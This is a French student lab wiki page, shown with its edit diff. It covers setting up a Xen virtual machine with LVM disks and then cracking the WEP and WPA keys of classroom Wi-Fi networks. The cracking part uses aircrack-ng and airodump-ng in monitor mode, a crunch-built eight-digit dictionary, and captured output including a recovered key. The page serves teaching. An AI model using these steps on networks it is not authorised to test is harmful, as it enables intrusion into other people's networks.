TP sysres IMA2a5 2021/2022 G12 : Différence entre versions
(→Création machine virtuelle) |
(→Création machine virtuelle) |
||
Ligne 58 : | Ligne 58 : | ||
− | == | + | == Craquage de clés : == |
− | Craquage clé WEP: | + | |
− | + | '''Craquage clé WEP:''' | |
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01". | Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01". | ||
Ligne 127 : | Ligne 127 : | ||
KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] | KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] | ||
Decrypted correctly: 100% | Decrypted correctly: 100% | ||
+ | |||
+ | '''Craquage clé WPA :''' | ||
+ | |||
+ | On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande : | ||
+ | |||
+ | apt-get install aircrack-ng | ||
+ | |||
+ | Listing de toutes les interfaces Wi-Fi | ||
+ | |||
+ | airmon-ng | ||
+ | |||
+ | On obtient la liste ci-dessous : | ||
+ | |||
+ | PHY Interface Driver Chipset | ||
+ | phy0 wlx40a5ef059e47 rt2800usb Ralink Technology, Corp. RT5370 | ||
+ | |||
+ | On passe la carte Wifi en mode monitor : | ||
+ | |||
+ | airmon-ng start wlx40a5ef059e47 | ||
+ | |||
+ | On observe les trames de réseaux avec la commande : | ||
+ | |||
+ | airodump-ng wlan0mon | ||
+ | |||
+ | On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8 | ||
+ | On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt : | ||
+ | |||
+ | airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon | ||
+ | |||
+ | On attend environ 1/4 d'heure pour récupérer suffisamment de trames. | ||
+ | |||
+ | Exécution de Aircrack : | ||
+ | |||
+ | On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels. | ||
+ | On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante : | ||
+ | |||
+ | crunch 8 8 0123456789 >> Dico_krakotte01.txt | ||
+ | |||
+ | Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers : | ||
+ | |||
+ | Cependant si je lançais la commande aircrack-ng tout de suite, ma machine mettrait un très long moment à trouver la clef en testant toutes les possibilités. Pour pallier ce problème, j'ai divisé mon dictionnaire en 5 fichiers distincts avec | ||
+ | |||
+ | split -b 200m Dico_krakotte01.txt | ||
+ | |||
+ | On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés | ||
+ | |||
+ | ls | ||
+ | >> Dico_Krakotte01.txt xaa | ||
+ | |||
+ | Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe. | ||
+ | |||
+ | Cassage de la clef WPA : | ||
+ | |||
+ | aircrack-ng -w xaa krakotte01.cap |
Version du 29 novembre 2021 à 11:27
Création machine virtuelle
Dans un premier temps, on dois créer une machine virtuelle sur le serveur distant. On s'y connecte donc en tant que superuser :
ssh -4 root@capbreton.plil.info
On créer alors la machine grâce à la commande qui suit :
xen-create-image --force --hostname=Battlefield --ip=193.48.57.172 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster
La machine est alors créée sur capbreton. On passe à la configuration des disques, pour créer un RAID5 :
lvcreate -L1G -n Battlefield1 virtual lvcreate -L1G -n Battlefield2 virtual lvcreate -L1G -n Battlefield3 virtual lvcreate -L1G -n Battlefield4 virtual
On augmente ensuite la taille des 4 disques :
lvextend -L +9G /dev/virtual/Battlefield1 lvextend -L +9G /dev/virtual/Battlefield2 lvextend -L +9G /dev/virtual/Battlefield3 lvextend -L +9G /dev/virtual/Battlefield4
On vérifie que les disques sont bien installés :
lvdisplay
Détail d'un disque installé :
--- Logical volume --- LV Path /dev/virtual/Battlefield1 LV Name Battlefield1 VG Name virtual LV UUID gvf9pC-5DAB-1YGt-fYJ1-ecrM-nZG2-ZFCf41 LV Write Access read/write LV Creation host, time capbreton, 2021-09-24 08:40:48 +0200 LV Status available # open 0 LV Size 10.00 GiB Current LE 2560 Segments 2 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 254:57
Puis on formate les disques :
mke2fs /dev/virtual/Battlefield1 mke2fs /dev/virtual/Battlefield2 mke2fs /dev/virtual/Battlefield3 mke2fs /dev/virtual/Battlefield4
Craquage de clés :
Craquage clé WEP:
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
Tout d'abord, on installe l'utilitaire aircrack-ng
su - apt install aircrack-ng
On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :
lsusb
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard Bus 001 Device 007: ID 413c:301a Dell Computer Corp. Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
On récupère le nom de l'interface de la clé Wifi :
airmon-ng
On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :
airmon-ng start wlx40a5ef059e47
On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:
airodump-ng wlan0mon
On obtient alors les informations suivantes :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:50 -40 2 3 4 3 54e WEP WEP cracotte01
On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :
airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon
On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :
aircrack-ng lcrack-01.cap
Après 5-10min, on obtient le code de la clé Wifi :
Aircrack-ng 1.5.2 [00:00:00] Tested 721 keys (got 665952 IVs) KB depth byte(vote) 0 1/ 2 27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896) 1 2/ 1 D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224) 2 1/ 3 9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640) 3 1/ 5 BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296) 4 13/ 4 35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568) KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ]
Decrypted correctly: 100%
Craquage clé WPA :
On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :
apt-get install aircrack-ng
Listing de toutes les interfaces Wi-Fi
airmon-ng
On obtient la liste ci-dessous :
PHY Interface Driver Chipset phy0 wlx40a5ef059e47 rt2800usb Ralink Technology, Corp. RT5370
On passe la carte Wifi en mode monitor :
airmon-ng start wlx40a5ef059e47
On observe les trames de réseaux avec la commande :
airodump-ng wlan0mon
On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8 On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt :
airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon
On attend environ 1/4 d'heure pour récupérer suffisamment de trames.
Exécution de Aircrack :
On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels. On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante :
crunch 8 8 0123456789 >> Dico_krakotte01.txt
Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers :
Cependant si je lançais la commande aircrack-ng tout de suite, ma machine mettrait un très long moment à trouver la clef en testant toutes les possibilités. Pour pallier ce problème, j'ai divisé mon dictionnaire en 5 fichiers distincts avec
split -b 200m Dico_krakotte01.txt
On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés
ls >> Dico_Krakotte01.txt xaa
Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe.
Cassage de la clef WPA :
aircrack-ng -w xaa krakotte01.cap